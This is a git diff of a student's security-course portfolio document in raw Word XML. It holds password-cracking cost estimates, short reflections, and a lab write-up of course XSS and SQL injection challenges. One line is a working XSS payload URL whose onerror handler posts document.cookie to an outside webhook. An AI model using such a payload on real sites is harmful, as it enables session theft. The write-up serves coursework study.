+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
+    <w:name w:val="Comment Subject Char"/>
+    <w:basedOn w:val="CommentTextChar"/>
+    <w:link w:val="CommentSubject"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="en-AU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Strong">
+    <w:name w:val="Strong"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="22"/>
+    <w:qFormat/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="css-emb99l">
+    <w:name w:val="css-emb99l"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00903D82"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:lang w:eastAsia="en-AU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="PlaceholderText">
+    <w:name w:val="Placeholder Text"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:color w:val="666666"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -1973,4 +5735,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2813D053-01F1-4C63-B5AF-1F2B15F5D0F6}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -1313,23 +1313,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:t>10 *(</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t>Ryzen 9/ Intel Ultra 9 + RTX2000</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t>)</w:t>
+                    <w:t>10 *(Ryzen 9/ Intel Ultra 9 + RTX2000)</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -1899,15 +1883,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:t>AMD Ryzen 5 5600x 6 Cores</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t xml:space="preserve"> (4.7GHz)</w:t>
+                    <w:t>AMD Ryzen 5 5600x 6 Cores (4.7GHz)</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -2814,7 +2790,13 @@
                 <w:rPr>
                   <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                 </w:rPr>
-                <m:t>24threads×5.7GHz×24hours≈</m:t>
+                <m:t>24threads×5.7GHz×24</m:t>
+              </m:r>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>hours≈</m:t>
               </m:r>
               <m:f>
                 <m:fPr>
@@ -2830,13 +2812,7 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                     </w:rPr>
-                    <m:t>3,283,200,000,000</m:t>
-                  </m:r>
-                  <m:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                    </w:rPr>
-                    <m:t>bits</m:t>
+                    <m:t>3,283,200,000,000bits</m:t>
                   </m:r>
                 </m:num>
                 <m:den>
@@ -2923,13 +2899,7 @@
                       <w:rPr>
                         <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                       </w:rPr>
-                      <m:t>3,283,200,000,000</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>bits</m:t>
+                      <m:t>3,283,200,000,000bits</m:t>
                     </m:r>
                   </m:num>
                   <m:den>
@@ -2961,25 +2931,7 @@
                       <w:rPr>
                         <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                       </w:rPr>
-                      <m:t>3</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>0</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>,283,200,000,000</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>bits</m:t>
+                      <m:t>30,283,200,000,000bits</m:t>
                     </m:r>
                   </m:num>
                   <m:den>
@@ -3034,13 +2986,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>I found a moderately setup rack with 2x</w:t>
-            </w:r>
-            <w:r>
-              <w:t>AMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W)</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> per unit for $75-100k so they could</w:t>
+              <w:t>I found a moderately setup rack with 2xAMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W) per unit for $75-100k so they could</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
@@ -3068,13 +3014,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t>≈18×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>2×32×3.55×</m:t>
+                  <m:t>≈18×2×32×3.55×</m:t>
                 </m:r>
                 <m:sSup>
                   <m:sSupPr>
@@ -3106,19 +3046,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t xml:space="preserve">= </m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>4,089,600,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve"> bits/second</m:t>
+                  <m:t>= 4,089,600,000,000 bits/second</m:t>
                 </m:r>
               </m:oMath>
             </m:oMathPara>
@@ -3133,31 +3061,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t>24×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>4,089,600,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve">= </m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>98,150,400,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve"> per day</m:t>
+                  <m:t>24×4,089,600,000,000= 98,150,400,000,000 per day</m:t>
                 </m:r>
               </m:oMath>
             </m:oMathPara>
@@ -3236,19 +3140,7 @@
                 <w:rPr>
                   <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                 </w:rPr>
-                <m:t>5000000×</m:t>
-              </m:r>
-              <m:r>
-                <w:rPr>
-                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                </w:rPr>
-                <m:t>6×</m:t>
-              </m:r>
-              <m:r>
-                <w:rPr>
-                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                </w:rPr>
-                <m:t>4.7×</m:t>
+                <m:t>5000000×6×4.7×</m:t>
               </m:r>
               <m:sSup>
                 <m:sSupPr>
@@ -3630,23 +3522,7 @@
                     <w:color w:val="333333"/>
                     <w:lang w:eastAsia="en-AU"/>
                   </w:rPr>
-                  <m:t>×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
-                    <w:color w:val="333333"/>
-                    <w:lang w:eastAsia="en-AU"/>
-                  </w:rPr>
-                  <m:t>24×3600≈</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
-                    <w:color w:val="333333"/>
-                    <w:lang w:eastAsia="en-AU"/>
-                  </w:rPr>
-                  <m:t>3.456×</m:t>
+                  <m:t>×24×3600≈3.456×</m:t>
                 </m:r>
                 <m:sSup>
                   <m:sSupPr>
@@ -3791,7 +3667,99 @@
             </w:r>
           </w:p>
           <w:p/>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Initially I tried to break the sql by breaking the user input here to prove that I can take control and used a sleep and this caused the gateway to fail rather than an exception being pulled so that helped me figure out the open door</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="360"/>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
+                  <wp:extent cx="4683318" cy="1676688"/>
+                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+                  <wp:docPr id="459274888" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="459274888" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4696926" cy="1681560"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
+                  <wp:extent cx="5498327" cy="2753275"/>
+                  <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
+                  <wp:docPr id="694017140" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="694017140" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId21"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5501315" cy="2754771"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p>
@@ -3834,35 +3802,43 @@
             <w:r>
               <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
             </w:r>
-            <w:r>
-              <w:t>:</w:t>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>I then decided to enter this url with a javascript forwarding session to a webhook I have to then retrieve the cookie from the server:</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="ListParagraph"/>
             </w:pPr>
-            <w:r>
-              <w:t>First Test</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:left="360"/>
             </w:pPr>
             <w:r>
-              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://webhooksite.net/7e34e9c2-187d-44b2-bf87-1538f7be3940',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="360"/>
-            </w:pPr>
-            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="78D47ACE">
-                  <wp:extent cx="5931205" cy="4064209"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="730E688E">
+                  <wp:extent cx="4801815" cy="3290323"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                   <wp:docPr id="315571931" name="Picture 1"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3875,7 +3851,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3883,7 +3859,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="5931205" cy="4064209"/>
+                            <a:ext cx="4810926" cy="3296566"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -3896,7 +3872,45 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
+                  <wp:extent cx="5943600" cy="1924050"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="1391029199" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1391029199" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5943600" cy="1924050"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -3939,7 +3953,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId21">
+      <w:hyperlink r:id="rId24">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4020,8 +4034,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId22"/>
-      <w:footerReference w:type="default" r:id="rId23"/>
+      <w:headerReference w:type="default" r:id="rId25"/>
+      <w:footerReference w:type="default" r:id="rId26"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -5251,6 +5265,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -214,8 +214,40 @@
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week. It discusses pseudorandom code generation, which is fundamental to many secure communication systems. These codes are designed to have high entropy and low correlation, making signals difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness and unpredictability are essential for maintaining security.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>The article also explains how physical effects, such as Doppler shift, can introduce correlation into transmitted codes. This highlights that security is influenced not only by the code itself but also by the physical environment in which it operates. As a result, designers must consider randomness in areas such as frequency selection and hopping patterns, in addition to the code sequence.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Another interesting point was that some algorithms only guarantee desirable security properties for fixed code lengths rather than variable-length systems. This reflects a common challenge in security engineering, where the effectiveness of a technique often depends on the assumptions under which it was designed. Overall, the article provided a useful example of how concepts such as entropy, unpredictability, and resistance to attack apply not only to cryptography but also to communication system design.</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Link:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:hyperlink r:id="rId9" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://insidegnss.com/codes-the-prn-family-grows-again/</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p/>
@@ -248,6 +280,7 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Humans, Measuring</w:t>
       </w:r>
       <w:commentRangeEnd w:id="0"/>
@@ -267,7 +300,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId13">
+      <w:hyperlink r:id="rId14">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -315,7 +348,7 @@
             <w:r>
               <w:t xml:space="preserve">Link: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId14" w:history="1">
+            <w:hyperlink r:id="rId15" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -341,7 +374,6 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
             </w:r>
           </w:p>
@@ -378,7 +410,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId15">
+      <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -469,7 +501,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId16">
+      <w:hyperlink r:id="rId17">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1503,6 +1535,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
+                    <w:lastRenderedPageBreak/>
                     <w:t>Large Organisation</w:t>
                   </w:r>
                 </w:p>
@@ -2063,7 +2096,6 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:lastRenderedPageBreak/>
                     <w:t>Professional bitcoin miner</w:t>
                   </w:r>
                 </w:p>
@@ -2634,7 +2666,7 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
+            <w:hyperlink r:id="rId18" w:anchor="date" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2675,7 +2707,7 @@
             <w:r>
               <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
+            <w:hyperlink r:id="rId19" w:anchor="cpu-commonality" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2736,6 +2768,7 @@
               </w:rPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t>I am assuming that this person will spend approximately 75%</w:t>
             </w:r>
             <w:r>
@@ -2875,7 +2908,6 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>Hence:</w:t>
             </w:r>
           </w:p>
@@ -3408,6 +3440,7 @@
                 <w:color w:val="333333"/>
                 <w:lang w:eastAsia="en-AU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
             </w:r>
             <w:r>
@@ -3595,7 +3628,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Extended</w:t>
       </w:r>
     </w:p>
@@ -3611,7 +3643,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId19">
+      <w:hyperlink r:id="rId20">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3684,6 +3716,9 @@
               <w:ind w:left="360"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
                   <wp:extent cx="4683318" cy="1676688"/>
@@ -3700,7 +3735,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId21"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3723,6 +3758,10 @@
           </w:p>
           <w:p>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                   <wp:extent cx="5498327" cy="2753275"/>
@@ -3739,7 +3778,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId21"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3829,7 +3868,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
+              <w:t xml:space="preserve">https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>decodeURIComponent(document.cookie)})"&gt;</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3851,7 +3898,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId23"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3874,6 +3921,9 @@
           </w:p>
           <w:p>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
                   <wp:extent cx="5943600" cy="1924050"/>
@@ -3890,7 +3940,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
